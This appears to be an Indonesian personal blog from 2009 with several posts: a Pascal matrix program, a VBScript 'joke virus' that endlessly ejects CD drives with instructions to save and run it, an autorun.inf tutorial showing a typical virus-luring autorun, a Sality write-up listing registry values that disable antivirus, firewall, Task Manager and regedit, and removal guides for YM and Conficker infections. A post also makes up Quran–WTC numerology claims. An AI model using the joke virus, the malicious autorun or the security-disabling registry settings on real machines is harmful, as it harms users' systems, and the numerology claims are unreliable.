Rabu, 18 Maret 2009

Algoritma Kode Pascal Perkalian Matriks

algoritma pascal ya ya ..
mata kuliah yang membosankan bagi saya yang membuat otak saya cepet cape.cepet emosional hehe.karena memang sedikit membingungkan untuk para calon-calon IT pemula seperti saya yang baru lulus dari bangku sekolah SMA.karena kita disini harus membuat logika-logika kita atau yang lebih dikenal algoritma.saya sendiri belum begitu mengerti tentang pascal itu sendiri.saya hanya mengikuti langkah algoritma yang saya terapkan untuk saya sendiri.Disini saya akan membuat contoh
Algoritma Pascal Perkalian Matriks
.
Mungkin ini hanya terapan saya saja.kalau terjadi kesalahan harap dimaklumi,jika anda lebih baik dari saya.saya harap anda bisa membetulkan dan membenari.
oke langsun aja contohnya nii dia :

program perkalian_matriks;
uses crt;

const n_i=2;
n_j=2;
n_k=1;

var
A: array [1..n_i,1..n_j] of integer;
B: array [1..n_j,1..n_k] of integer;
C: array [1..n_i,1..n_k] of integer;
i,j,k:integer;
begin
clrscr;
writeln(’penetapan nilai matriks A’);

for i:=1 to n_i do
for j:=1 to n_j do
begin

write(’baris ke-’,i,’kolom ke-’,j,’ :’);
readln(A[i,j]);
end;

writeln(’penetapan nilai matriks B’);

for j:=1 to n_j do
for k:=1 to n_k do
begin

write(’baris ke-’,j,’kolom ke-’,k,’ :’);
readln(B[j,k]);
end;
writeln(’Perhitungsn sedang dilakukan ..’);
for i:= 1 to n_i do
for k:= 1 to n_k do
begin
C[i,k] :=0;

for j:= 1 to n_j do
C[i,k] := C[i,k]+A[i,j] * B[j,k];
end;
writeln(’Maka nilai matriks C’);

for i:=1 to n_i do
begin
for k:=1 to n_k do
write(C[i,k]:4);
writeln;

end;

readln;
end.


cukup ini saja dulu mungkin dapat membantu anda semua.

Jumat, 13 Maret 2009

source Code Virus Joke.Eject.Cd

do
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
End If
loop
—–


cut here…

Cara bikinnya, pertama kopi tulisan kode diatas lalu simpen diNotepad,,,trus simpen dgn ekstensi “.vbs” [tanpa tanda petik]…trus klik 2 kali file virus tsb,,,maka virus akn aktif,,,heheee…..

Niy code virus sederhana, di detek sbg joke.eject.cd…

selamat mencoba..

Bahayanya Autorun.inf

Saat kita memasukkan CD, misalnya CD Video, ke CD-Drive, maka komputer akan segera meresponnya dengan menjalankan isinya secara otomatis. Dan kita tinggal menikmati film yang ingin kita tonton. Atau mungkin saat kita melakukan setup suatu program, dan memasukkan CD program, komputer meresponnya dengan menampilkan fasilitas program setup secara otomatis. Itulah yang dimaksud dengan fitur autorun.
AutoRun adalah salah satu fitur Windows. Ftur ini akan menjalankan secara otomatis prosedur penginstalan dan pengkonfigurasian program (produk) yang didesain dengan platform berbasis Windows. Umumnya program ini ada dalam CDROM. Saat kita memasukkan CD yang memiliki data-data autorun ke cdrom drive, secara otomatis Windows akan menjalankan aplikasi yang mungkin akan dipakai untuk instal, konfigurasi atau bahkan menjalankan sembarang file executable.
Jadi, fitur Autorun ini pada awalnya memang disediakan untuk kemudahan akses program di CD-ROM. Namun pada perkembangannya, di Indonesia, fitur Autorun ini banyak dieksploitasi untuk perkembang–biakan virus (worm) via removable media semacam Flash Disk. Pada artikel ini, kita akan memakai media flashdisk sebagai contoh. Karena media inilah yang ditengarai sebagai biang keladi penyebaran virus di Indonesia.

Dua hal penting

Bagaimana caranya agar aplikasi (file execute) yang kita inginkan dijalankan oleh fitur autorun ini ? Ada dua hal penting yang harus kita penuhi untuk melaksanakan niat ini. Pertama, kita harus membuat suatu file yang bernama Autorun.inf. Kedua, adalah mempersiapkan aplikasi yang akan dijalankan. File Autorun.inf adalah file teks ASCII biasa. Sehingga dapat dibuat dengan program teks editor semacam notepad.


Tentang Autorun.inf

Autorun.inf adalah suatu file teks yang biasanya ada pada root directory dari suatu CD-ROM yang berisi aplikasi. Fungsi utamanya adalah memberitahu system, tentang nama dan lokasi aplikasi startup program (file execute) yang akan dijalankan saat disk (CD) dimasukkan.
Autorun.inf dapat berisi info opsional seperti : Nama file yang berisi icon yang akan mewakili aplikasi. Icon ini akan ditampilkan oleh Windows Explorer menggantikan icon drive standar.
Juga ia dapat berisi, perintah-perintah tambahan untuk shortcut menu (menu konteks) yang akan ditampilkan saat kita melakukan klik kanan pada icon CD-ROM. Juga, kita dapat mendefinisikan perintah default yang akan dijalankan, saat kita melakukan klik ganda pada icon tersebut.
Sekilas, file Autorun.inf mirip dengan file *.INI. Karena akan berisi satu atau dua bagian (section) yang diapit oleh tanda kurung kotak (square brackets). Pada setiap section akan berisi serangkaian perintah yang akan dijalankan oleh shell saat disk dimasukkan.
Ada dua section pada autorun, yaitu : [Autorun] dan [DeviceInstall]. Kita akan melihatnya sekilas.
* Section [autorun]
Section ini berisi perintah default autorun. Setiap file autorun.inf pasti mempunyai section ini. Sebetulnya ada section tambahan, [autorun.alpha], namun hanya diperuntukkan bagi komputer yang memakai sistem basis RISC (RISC-based).
* Section [DeviceInstall]
Section ini dapat dipasangkan pada sembarang removable media dan hanya di-support oleh sistem operasi Windows XP ke atas. Hanya ada satu perintah pada section ini, yatitu : DriverPath, yang berguna untuk menentukan directory path dimana Windows XP harus mencari file-file driver. Sekadar info, pada Windows XP seluruh media tidak lagi dicari secara default, maka dibutuhkanlah section ini untuk menyebutkan lokasi pencarian.
Oleh karena, perintah ini digunakan hanya saat instalasi driver, dan secara pasti tidak merupakan bagian dari operasi autorun, maka kita tidak akan membahasnya. Kita hanya akan membahas Section [autorun] saja.

Perintah standar pada section [Autorun]

Beberapa perintah standar pada bagian ini adalah sebagai berikut :
Icon
Label
Action
Open
Shellexecute
Shell
shellverb
Setelah ini, kita akan melihat perintah (masukan) tersebut secara ringkas. Sebagai contoh kita akan memakai media Flash Disk saja. Karena saat ini media inilah yang lazim dipakai sebagai sarana simpan dan transfer data oleh pemakai komputer.
Anggap saja kita memasukkan suatu Flash Disk via USB port, dan akan terlihat bahwa Flash Disk aktif di drive I. Label dari Flash Disk tersebut adalah Cybersufi. Lihat gambar 1.


Gambar 1 : Flashdisk aktif pada drive I

Juga, asumsikan, kita telah mengopikan file execute yang bernama test.exe, yang mempunyai dua icon dalam filenya. Kita letakkan di root directory Flash Disk.
Kita akan membuat suatu file yang bernama autorun.inf dengan bantuan program notepad. Klik ganda icon Flash Disk sehingga isinya terlihat. Lalu buat suatu file baru dengan mengklik kanan pada sembarang bagian kosong, sehingga menu konteks tampil. Pilih New –Text Document. Lihat gambar 2. Suatu file teks scrap akan muncul. Beri nama file tersebut dengan nama autorun.inf. Klik ganda file tersebut, maka program notepad akan aktif. Siap untuk menerima pengetikan data-data autorun. Lakukan pengetikan data dan simpan dengan mengklik File – Save.


Gambar 2 : Membuat file teks baru

Sekarang kita cermati perintah-perintah yang ada pada section [autorun].
Perintah action
Masukan atau perintah ini, mendefinisikan teks yang akan dipakai untuk dialog autoplay. Tepatnya, sebagai handle yang mewakili program yang disebutkan oleh perintah Open atau Shellexecute. Sedangkan value yang dimasukkan dapat berupa teks atau suatu resource yang ada dalam suatu file binner. Sintaksnya :

action=Text
atau
action=@[filepath]filename,-resourceID

Masukan Text diisi dengan teks yang akan ditampilkan. Sedangkan masukan Filepath menunjukkan loakasi (path) dari suatu directory dimana file binner yang berisi string tersebut berada. Jika path tidak disebutkan, maka dianggap disimpan di root directory drive. Masukan Filename diisi nama file binner (atau execute). Sedangkan masukan resourceID berisi ID string yang ada dalam file binner.
Perintah ini hanya dipakai di Microsoft Windows XP Service Pack 2 (SP2) dan sesudahnya. Contoh sederhana pemakaiannya adalah sebagai berikut :

[autorun]
action= Klik ini untuk test setup autorun
open=test.exe

Ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Tampilannya lebih kurang seperti terlihat pada gambar 3.


Gambar 3 : Hasil perintah action

Perintah icon
Perintah ini mendefinisikan icon yang akan ditampilkan pada drive. Sintaksnya :

icon=filename[,index]

Masukan filename diisi dengan nama dari file jenis *.ico, *.bmp, *.exe atau *.dll, yang menngandung icon. Jika dalam suatu file berisi lebih dari satu icon, maka harus disebutkan index icon dengan basis nol. Jadi hitungan dimulai dari 0. Artinya index 0 sama dengan icon pertama.
File icon harus berada pada directory yang sama dengan file yang didefinisikan oleh perintah Open. Sebagai ilustasi, anggap kita mempunyai file execute dengan nama Test.exe . File ini mempunyai beberapa icon didalam filenya. Dan kita ingin memakai icon kedua yang ada, maka perintahnya adalah :
[autorun]
Icon=test.exe,1

Jika kita ingin agar icon pertama yang tampil, maka cukup kita ganti datanya sebagai berikut.
[autorun]
Icon=test.exe

Ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Hasilnya lebih kurang seperti terlihat pada gambar 4.


Gambar 4 : Icon Flash Disk berubah sama dengan icon file exe

Perintah label
Perintah ini berguna untuk mendefiniskan label teks yang akan ditampilkan. Sintaksnya :

Label=text

Masukan Text berisi data string teks yang dapat berisi spasi. Sebagai ilustrasi, misalkan kita ingin agar keterangan pada drive bertuliskan : autorun test, maka perintahnya :

[autorun]
Icon=test.exe,1
Label=autorun test

Hasilnya seperti terlihat pada gambar 5.


Gambar 5 : Keterangan label Flash Disk berubah

Perintah open
Perintah ini dipakai untuk mendefinisikan path dan nama file dari aplikasi yang akan dijalankan oleh autorun saat disk (CD) dimasukkan ke drive. Sintaksnya :

open=[exepath]exefile [param1 [param2] ...]

Masukan exepath menunjukkan lokasi dimana file exe berada. Masukan exefile berisi masukan dari Nama file exe yang akan dijalankan. Sedangkan masukan param, param2…. Berisi parameter tambahan yang akan di pass ke aplikasi
Yang perlu diperhatikan, jika isi perintah Open ini hanya berisi nama file exe saja, maka file exe harus berada di root directory drive. Jika kita ingin menjalankan file yang disimpan di directory lain, maka kita harus menyebutkan path-nya. Bila dibutuhkan, kita dapat menyertakan command-line parameter untuk di –pass ke aplikasi startup.
Berikut ini adalah contoh isi autorun.inf sederhana.

[autorun]
open=Coba.exe
icon=Coba.exe,1

Isi file tersebut menyebutkan, bahwa aplikasi starup (file execute) yang akan dijalankan adalah Coba.exe. Sedangkan icon kedua yang ada dalam file coba.exe, akan dipakai mewakili CD-ROM drive menggantikan icon standard drive.

Perintah shellexecute
Perintah ini digunakan unutk mendefinisikan aplikasi atau data file yang akan dijalankan oleh autorun secara ShellExecuteEx.

shellexecute=[filepath]filename[param1, [param2]...]

Masukan filepath berisi string yang menyebutkan dimana path directory file data atau file execute berada. Jika path tidak disebutkan maka file harus berada di root directory drive. Masukan filename berisi nama file. Jika filenya adalah file execute maka akan dijalankan. Sedangkan, jika isinya adalah file data maka ia haruslah anggota dari suatu file class. Artinya jenis file data harus ada dalam daftar file yang dikenali oleh Windows. Sehingga ShellExecuteEx dapat menjalankan file data tersebut dengan perintah default terkait dengan file class.
Masukan paramx berisi tambahan parameter yang akan di lewatkan ke ShellExecuteEx.
Masukan (perintah) ShellExecuteEx ini mirip dengan perintah Open. Hanya saja mengijinkan kita memakai informasi asosiasi file untuk menjalankan suatu aplikasi.

[autorun]
shellexecute=test.exe

Perintah diatas menjalankan file test.exe yang ada di root directory drive. Atau contoh lain :
[autorun]
shellexecute=Datakubaca.txt

Perintah diatas menjalankan file baca.txt yang ada di directory Dataku.

Perintah shell
Perintah ini dipakai untuk mendefinisikan perintah default untuk shortcut menu (menu konteks) drive. Sintaknya :

shell=verb

Masukan verb adalah verb yang berhubungan dengan menu perintah. Verb dan menu terkaitnya harus didefinisikan di autorun.inf via perintah shellverb.
Saat kita klik kanan icon drive, suatu shortcut menu (menu konteks) muncul. Jika file autorun ada, maka menu konteks tersebut akan “diambil alih” oleh autorun. Untuk mendefinisikan menu ini, pertama kita harus mendefinisikan verb, command string dan teks menu dengan perintah shellverb. Kemudian memakai perintah shell untuk membuat default menu perintah. Jika tidak, maka menu default akan berbunyi “autoplay”.

Perintah shellverb
Perintah ini digunakan untuk mendefinisikan perintah tambahan pilihan menu shortcut (menu konteks). Sintaknya :

shellverbcommand=Filename.exe
shellverb=MenuText

Masukan Verb yang ada pada menu perintah shellverbcommand, akan berhubungan dengan suatu file execute. Verb tidak boleh berisi spasi. Singkat kata, verb diisini adalah teks yang ditampilkan di menu konteks.
Masukan Filename.exe berisi data path dan nama file aplikasi yang menjalankan perintah
Masukan MenuText berisi teks yang akan ditampilkan pada menu konteks. Jika dihilangkan maka teks pada verb yang akan ditampilkan. Menu text dapat berisi huruf besar dan kecil, juga berisi spasi.
Saat kita melakukan klik kanan pada icon drive, menu konteks akan tampil. Dengan membuat perintah shell/verb maka akan menambah masukan di menu konteks tersebut. Masukan ini ada dua. Pertama, shell/verb/command, yang berguna untuk menentukan file mana yang akan dijalankan. Kedua, adalah shell/verb yang Kita digunakan untuk menampilkan teks di menu konteks.
Untuk membuat suatu default perintah menu konteks, definisikan dengan shell/verb dan buatlah menjadi default dengan perintah shell.
Mungkin keterangan ini agak membingungkan, tapi dengan suatu contoh akan membuatnya mudah. Perhatikan contoh berikut:

[AutoRun]
shellcobacommand=notepad Datakubaca.txt
shellcoba=Cobalah Saya
shell=coba

Dari data di atas verb-nya adalah coba dengan string perintah “notepad Datakubaca.txt”. Menu teksnya adalah Cobalah Saya. Dan perintah dibuat default dengan perintah shell. Jika nanti kita pilih pilihan ini maka file baca.txt akan dibuka dengan program Notepad.
Agar dapat membuat fungsi ini berjalan dengan baik, sebelumnya kita harus membuat suatu folder terlebih dahulu dengan nama DATAKU. Juga, didalamnya harus terdapat file yang bernama BACA.TXT.
Misalnya, kita ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Hasilnya lebih kurang seperti terlihat pada gambar 6.


Gambar 6 : Menu konteks bertambah

Autorun jebakan pada Flash Disk

Seperti telah disinggung di muka, Autorun awalnya ditujukan untuk kemudahan pemakaian CD-ROM. Namun pada perkembangannya ternyata fungsi autorun di eksploitasi dan “didayagunakan” oleh pembuat virus untuk melakukan eksekusi program virus. Jadi, flashdisk yang seharusnya tidak berisi file autorun.inf, akan dijejali dengan file tersebut. Akibatnya ? Cukup fatal ! Menjamurlah virus disana-sini dengan bantuan autorun yang disalahgunakan via flashdisk.
Lalu, isi file autorun.inf nya bagaimana ? Berikut ini, sekadar contoh, tipikal isi dari file autorun yang di eksploitasi oeh program virus.

[AutoRun]
icon=virus.exe
action=Klik untuk menjalankan file gambar hot
shellexecute= virus.exe
shellopenCommand= virus.exe
shellExploreCommand= virus.exe

Jika diuraikan secara ringkas, maka deskripsi per barisnya adalah sebagai berikut.
Perintah icon=test.exe digunakan untuk memanipulsi icon tampilan Flash Disk, sehingga ikon standar disk akan diganti dengan icon file executable yang benama test.exe.
Perintah action=Klik untuk menjalankan file gambar hot. Dipakai untuk menampilkan pesan yang amat menantang dan memancing korban, agar mengklik pilihan ini. Misalnya dengan pesan : Klik untuk menjalankan file gambar hot
Perintah shellexecute=test.exe digunakan untuk memasang perangkap dengan perintah shellexecute, agar saat icon Flash Disk diklik ganda pemakai, maka akan aktiflah file virus.exe.
Perintah shellopenCommand=test.exe untuk menjebak pemakai saat melakukan klik kanan pada Flash Disk, dengan cara mengganti isi pilihan default menu konteks yang bernama open. Jika pemakai memilih Open yang dijalankan adalah file virus.exe.
Perintah shellExploreCommand=test.exe digunakan untuk menjebak pemakai saat melakukan klik kanan pada Flash Disk, dengan cara mengganti isi pilihan default menu konteks yang bernama Explore. Jika pemakai memilih Explore, yang dijalankan adalah file virus.exe.
Dengan jebakan yang begitu rapat, sungguh membuat pemakai awam yang kurang waspada menjadi tidak berdaya. Umumnya pemakai akan membuka Flash Disk via My Computer dan mengklik ganda icon Flash Disk. Akibatnya ? Aktiflah sang virus.

Bagaimana berkelit ?

Agak susah menjawab pertanyaan ini. Namun, bahaya jebakan autorun dapat sedikit dikurangi dengan mematikan fitur autorun. Penon-aktifan fitur ini dapat dilakukan via Policy Editor, ataupun melakukan manipulasi langsung via Regedit. Dan ini membutuhkan pembahasan tersendiri.
Namun, cara sederhana, temporer, untuk menghindari jebakan autorun ini dapat dilakukan dengan memakai jasa Windows Explorer (atau My Documents).
Panggil My Documents. Klik Start – Pilih My Documents. Jendela My Documents. Akan muncul. Klik Tools dan pilih Folder Options. Kita akan mengatur setingan View Windows Explorer terlebih dahulu. Lihat gambar 7.


Gambar 7 : Memanggil My Document dan memilih Folder Options

Saat jendela Folder Options muncul. Klik Tab View. Dan klik pilihan Show Hidden Files and folders. Langkah ini berguna untuk menampilkan file yang tersembunyi. Lihat gambar 8.


Gambar 8 : Mengatur View memilih Show Hidden Files and folders

Langkah berikutnya, adalah menampilkan file System. Masih pada tab yang sama, klik Hide Protected operating system (recommended). Akan muncul pesan peringatan Windows. Klik Yes untuk mengabaikan pesan tersebut. Lihat gambar 9.


Gambar : Pesan peringatan

Setelah itu pilihan Hide Protected operating system (recommended) akan tidak tercentang, klk OK. Lihat gambar 10.


Gambar 10 : Menampilkan file system lalu klik Ok.

Sekarang saatnya menancapkan Flash Disk. Jika fitur autorun berjalan, maka seharusnya akan tampil kotak dialog autoplay. Disarankan untuk memilih Take no action. Sehingga folder Flash Disk tidak akan terbuka. Lihat gambar 11.


Gambar 11 : kotak dialog autoplay – autorun

Panggil My Documents. Klik Start – pilih My Documents. My Documents akan muncul. Jika tampilan panel sebelah kiri My Documents tidak menunjukkan folder tree. Maka klik tombol Folder. Lihat gambar 12.


Gambar 12 : Mengklik tombol Folder

Sesudah panel kiri My Dcouments menampilkan folder tree, Klik My computer dan pilih Drive dimana Flash Disk berada. Maka pada panel sebelah kanan, akan terlihat isi dari Flash Disk, berikut file-file tersembunyi.


Gambar 13 : memilih drive Flash Disk dari folder

Jika sudah sampai tahap ini, langkah awal yang harus dilakukan adalah menghapus file autorun.inf. Sesudah itu, jika terdapat file-file tersembunyi yang menurut kita mencurigakan, hapus saja ! Dengan trik sederhana ini, diharapkan penyebaran virus yang mengekploitasi fitur autorun akan sedikit terhambat. Coba saja, semoga berhasil !

Senin, 09 Maret 2009

Bukti Maha Kuasa Allah s.w.t

Ass.wr.wb,
SUBHANALLAH..... ALLAHUAKBAR........... 3x Tragedi WTC ada dalam QS. At Taubah???
Kemarin aku cukup tercengang mendapat email dari rekan yang mengatakan bahwa tragedi WTC ternyata sudah dituturkan Allah dalam Qs. At Taubah :109...

109. Maka apakah orang-orang yang mendirikan bangunannya di atas dasar taqwa kepada Allah dan keridhaan-(Nya) itu yang baik, ataukah orang-orang yang mendirikan bangunannya di tepi jurang yang runtuh, lalu bangunannya itu jatuh bersama-sama dengan dia ke dalam neraka Jahannam. Dan Allah tidak memberikan petunjuk kepada orang- orang yang zalim.

Disitu disebutkan keruntuhan sebuah bangunan karena yang mendirikannya adalah orang -orang yang zalim... WTC yang runtuh di kota New York pada tanggal 11/9/2001 berada di jalan JERF HAR telah disebutkan di atas pada kata "JURUFIN HAR" oleh ulama tafsir dulu diterjemahkan sebagai "ditepi jurang yang runtuh" ternyata adalah nama sebuah jalan dikota New York tadi, JERF HAR.

Surat Attaubah terletak pada juzz 11 menunjukkan tanggal 11 kejadian tsb, tgl terjadinya tragedi WTC. Sedangkan angka 9 yang menunjukkan bulan September, sama dengan QS. Attaubah yang berada pada urutan Alquran, dimana surat Attaubah berada pada urutan ke 9. Ayat 109...... ternyata jumlah tingkat di gedung WTC ada 109 tingkat..!!!

Kejadian tersebut pad atahun 2001, setelah dihitung2, jumlah huruf di Surat
>> >>> At Taubah ada 2001 ayat !!!

Subahanallah.... Ternyata Allah telah memberikan khabarnya 14 abad yang lalu tanpa diketahui oleh manusia. Inikah mukjizat Alqur'an?? Yang telah membuktikan kejadian pada masa yang akan datang.

Jumat, 06 Maret 2009

Aku benci virus Sality !!!

Haduh Aku benci Sality!

Benci sality? Ya wajar saja. Sality salah satu virus yang bikin kita emosi sekaligus memaksa kita mengabsen nama-nama penghuni kebun binatang…

Apa saja efek sality?
Sality membawa beberapa dampak pada kompi kita. Seperti disable taskmanager, regedit, hidden file dan lain-lain. Sality juga punya banyak varian yang bermacam-macam.

Sebenarnya tutorial ini gak begitu membahas mengenai sality secara mendetail, hanya mengulas sedikit saja.

Baru-baru ini komputerku kena salah satu varian sality. Dan mungkin saja varian ini sama dengan varian yang ada di kompi kalian. He he he

Umumnya kalau terkena sality ini AV kita biasanya ter-nonaktifkan…
Contohnya sebut saja Avira. Avira tidak bisa aktif jika kompi kita terinfeksi sality (varian sality yang aku maksud tadi)

Lalu sality ini juga akan menutup semua program yang memiliki caption ”antivirus”. Artinya jika ada program yang punya caption ”antivirus” akan ditutup segera oleh si sality.

Tahu kah kamu mengapa antivirus (umumnya antivirus asing) dan update status AV bisa didisabled oleh Sality???
Inilah jawabannya!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
-UacDisableNotify = 0×00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
-AntiVirusOverride = 0×00000001
-AntiVirusDisableNotify = 0×00000001
-FirewallDisableNotify = 0×00000001
-FirewallOverride = 0×00000001
-UpdatesDisableNotify = 0×00000001
-UacDisableNotify = 0×00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
-AntiVirusOverride = 0×00000001
-FirewallOverride = 0×00000001

Itu dia alamat-alamat registry yang dimainkan oleh si Sality. Kalau kamu seorang VM. Silakan mainkan juga alamat registri ini sebijak mungkin!

Selain itu sality juga mendisable regedit dan taskmanager.
Berikut alamat yang diubah.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
-EnableLUA = 0×00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
-DisableTaskMgr = 0×00000001
-DisableRegistryTools = 0×00000001

Kamu perlu tahu kalau sality masih hidup alias masih aktif Taskmanager dan regedit tidak akan bisa dihidupkan meski sudah diperbaiki dengan registry Tweaker manapun!
Untuk menghidupkannya kamu membutuhkan fitur pada Morphost. Meski dalam keadaan disabled Morphost bisa memanggil taskmanager dan regedit! Silakan coba!

Kemudian sality juga membuat registry yang tidak begitu aku mengerti. Tapi kalian semua perlu tahu!
[HKEY_CURRENT_USER\Software\%UserName%914\-72398023]
1919251285 = 0×00000026
-456464726 = 0×00000000
1462786559 = 0×00000000
-912929452 = 0×00000023
1006321833 = 0×000000A1
-1369394178 = “0500687474703A2F2F6C7A2E7A702E75612F6D61696E682E67696600687474703A2F2F6D616365646F6E69612E6D79312E72752F6D61696E682E67696600687474703A2F2F6C70626D782E72752F6C6F676F732E67696600687474703A2F2F6F30786F2E636F6D2F6C6F676F732E67696600687474703A2F2F6E65787
549857107 = “329F0CD8FADAF785DB7411FBFD9B9EFB2163D59E0D02D016DD672211D874252F4264A673CFC536D81ADA1665EAB18CE431A4C7549FD1C59F93C069AA66645518E7F6B8B7C645CFDAB224BE156F7952E11732778C37A38D6A9954528D0449883463AFA5834D9E6DD48205931EC60718A007713AE08F8B560EE15B389FE
[HKEY_CURRENT_USER\Software\%UserName%914]
U1_0 = 0xCC96283A
U2_0 = 0×0000158D
U3_0 = 0×01036A29
U4_0 = 0×00000000

Itu dia sedikit pembahasan mengenai varian sality yang aku punya.buat para master harap dikoreksi yaa.

6 tahap manual membasmi virus yang menyerang Yahoo Messengers

Sekarang banyak virus yang menyerang YM,sebelum kejadian itu terjadi. Ada baiknya Anda simak 6 cara jitu untuk membasmi virus perusak nama baik yang menyerang aplikasi chat ini seperti dilansir Vaksincom:

1. Disable 'System Restore' selama proses pembersihan.
2. Disable autorun Windows, agar virus tidak dapat aktif secara otomatis saat akses ke drive /flash disk.

* Klik tombol 'start'
* Klik 'run'
* Ketik 'GPEDIT.MSC', tanpa tanda kutip. Kemudian akan muncul layar 'Group Policy'
* Pada menu 'Computer Configuration dan User Configuration', klik 'Administrative templates'
* Klik 'System'
* Klik kanan pada 'Turn On Autoplay', pilih 'Properties'. Kemudian akan muncul layar 'Tun on Autoplay propeties'
* Pada tabulasi 'Setting', pilih 'Enabled'
* Pada kolom 'Tun off Autoplay on' pilih 'All drives'
* Klik 'Ok'


3. Matikan proses virus, gunakan tools 'security task manager' kemudian hapus file [sysmgr.exe, vshost.exe, winservices.exe, *.tmp]

Sekadar catatan, .tmp menunjukan file yang mempunyai ekstensi TMP [contoh: 5755.tmp]. Klik kanan pada file tersebut dan pilih 'Remove', lalu pilih opsi 'Move File to Quarantine'.

4. Repair registry yang sudah diubah oleh virus. Untuk mempercepat proses penghapusan silahkan salin script dibawah ini pada program notepad kemudian simpan dengan nama repair.inf. Jalankan file tersebut dengan cara: Klik kanan repair.inf, lalu pilih instal.

[Version]
Signature="Masberto"
Provider=Negara Kertagama


[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del


[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKCU, SessionInformation, ProgramCount, 0x00010001,3
HKCU, AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current,,,"C:\WINDOWS\media\Windows XP Pop-up Blocked.wav"
HKCU, AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current,,,"C:\Windows\media\Windows XP Recycle.wav"
HKCU, AppEvents\Schemes\Apps\Explorer\Navigating\.Current,,,"C:\Windows\media\Windows XP Start.wav"
HKCU, AppEvents\Schemes\Apps\Explorer\SecurityBand\.current,,,"C:\WINDOWS\media\Windows XP Information Bar.wav"

[del]

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Microsoft(R) System Manager
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, bMaxUserPortWindows Service help
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, MaxUserPort

5. Hapus file virus berikut:
C:\vshost.exe [all drive]

C:\autorun.inf [all drive]

C:\RECYCLER\S-1-5-21-9949614401-9544371273-983011715-7040\winservices.exe

C:\Documents and Settings\%user%\Local Settings\Temp

A415.tmp [acak]

034.exe [acak]

Lady_Eats_Her_Shit--www.youtube.com

C:\WINDOWS\system32\sysmgr.exe

C:\WINDOWS\TEMP\5755.tmp

C:\windows\system32\crypts.dll

C:\windows\system32\msvcrt2.dll

okee begitu aja.sedia jas hujan sebelum mendung.alahh.semoga membantu coy.

7 Langkah membasmi Virus Conficker secara manual coy

Haduh nulis artikel setiap jam 3 pagi terus ga ada yang beres satupun tapi mudah2an yang ini beneer.Conficker yap siap sii yang kenal si kampret ini eh si virus kampret mah kegedeean.ntar kalo masuk komputer bisa langsung ditembak hahahaha.Okeh langsung aja kita lanjutkan perjuangan kita membasmi virus conficker secara manual.

1. Putuskan komputer yang akan dibersihkan dari jaringan/internet.
2. Matikan system restore (Windows XP/Vista).
3. Matikan proses virus yang aktif pada services. Gunakan removal tool dari apa aja yang ada kaya HijackThis ataw apalah untuk membersihkan virus yang aktif. Jika belum memiliki, bisa didownload di situs
.
4. Delete service svchost.exe gadungan yang ditanamkan virus pada registry. Anda dapat mencari secara manual pada registry.
5. Hapus Schedule Task yang dibuat oleh virus. (C:\WINDOWS\Tasks)
6. Hapus string registry yang dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry di bawah ini:

[Version]
Signature="Masberto"
Provider=Negara Kertagama

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
Hidden, 0x00000001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
SuperHidden, 0x00000001,1
HKLM,
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,
CheckedValue, 0x00000001,1
HKLM, SYSTEM\CurrentControlSet\Services\BITS, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\ERSvc, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wscsvc, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wuauserv, Start, 0x00000002,2

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, dl
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, dl
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, TcpNumConnections

Gunakan notepad, kemudian simpan dengan nama 'repair.inf', lalu 'Save As Type' menjadi 'All Files' agar tidak terjadi kesalahan. Jalankan repair.inf dengan klik kanan, kemudian pilih install.

Sementara untuk file yang aktif pada startup, Anda dapat mendisable melalui 'msconfig' atau dapat mendelete secara manual pada string: 'HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

7. Untuk pembersihan virus W32/Conficker.DV secara optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang terupdate dan mampu mendeteksi virus ini dengan baik dan patch komputer Anda dengan patch resmi dari Microsoft guna mencegah infeksi ulang.

Anti Virus Palsu/Gadungan Menyerbu Indonesia










